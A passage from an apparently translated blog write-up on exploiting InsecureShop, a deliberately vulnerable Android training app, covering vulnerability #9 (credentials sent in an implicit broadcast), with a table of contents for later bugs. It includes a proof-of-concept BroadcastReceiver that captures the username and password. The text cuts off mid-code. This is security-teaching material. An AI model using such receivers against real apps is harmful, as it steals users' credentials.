[Android Security] insecureshop vulnerability mining-Part 2

Vulnerability #9 - Using implicit intent to send broadcast with sensitive data
Vulnerability #10 - Intercepting implicit intents to load arbitrary URLs
- 1. Vulnerability analysis
poc writing
Vulnerability #11 - Insecure implementation of SetResult in exported Activity
- 1. Vulnerability analysis
- 2.poc writing
Vulnerability #12 - Insecure Content Provider
- 1. Vulnerability analysis
- 2.poc writing
Bug #13 - Lack of SSL Certificate Verification
Vulnerability #14 - Insecure Data Storage
Bug #15 - Insecure Logging

Vulnerability #9 - Using implicit intent to send broadcast with sensitive data

1. Vulnerability analysis

AboutUsActivity.class
can see that a broadcast is implicitly sent through the action, and the content is the user name and password.
Insert image description here
How is this onSendData triggered? Check the source code again and find that there is no direct call in the current source code file.

It is suspected that the call may be made elsewhere. Check the layout file activity_about_us.xml.
In the layout file, the onclick event of the button element is associated with the onSendData method.
Insert image description here

2.poc writing

2.1 poc Android apk targetSdkVersion <=25-declared in the dependency list

如果目标targetSdkVersion <=25
If you want to receive implicit broadcasts, you can declare registration in androidManifest.xml

<receiver>
    android:name=".vul_broadcastReciever.MyReceiver"
    android:enabled="true"
    android:exported="true">
    <intent-filter>
        <action android:name="com.insecureshop.action.BROADCAST"/>
    </intent-filter>
</receiver>

MyReceiver.class

public class MyReceiver extends BroadcastReceiver {
   
    
    

    @Override
    public void onReceive(Context context, Intent intent) {
   
    
    

        if (intent != null){
   
    
    
            String action = intent.getAction();
            if ("com.insecureshop.action.BROADCAST".equals(action)){
   
    
    
                String username = intent.getStringExtra("username");
                String password = intent.getStringExtra("password");

                if (username != null && password != null ) {
   
    
    
                    // 通过显示intent发送数据到activity中
                    Intent intent1 = new Intent(context,Vul_getDataFromBroadcast.class);
                    intent1.putExtra("username",username);
                    intent1.putExtra("password",password);
                    context.startActivity(intent1);
                }
            }
        }
    }
}

Vul_getDataFromBroadcast.class

// 接收数据
String username = getIntent().getStringExtra("username");
String password = getIntent().getStringExtra(&#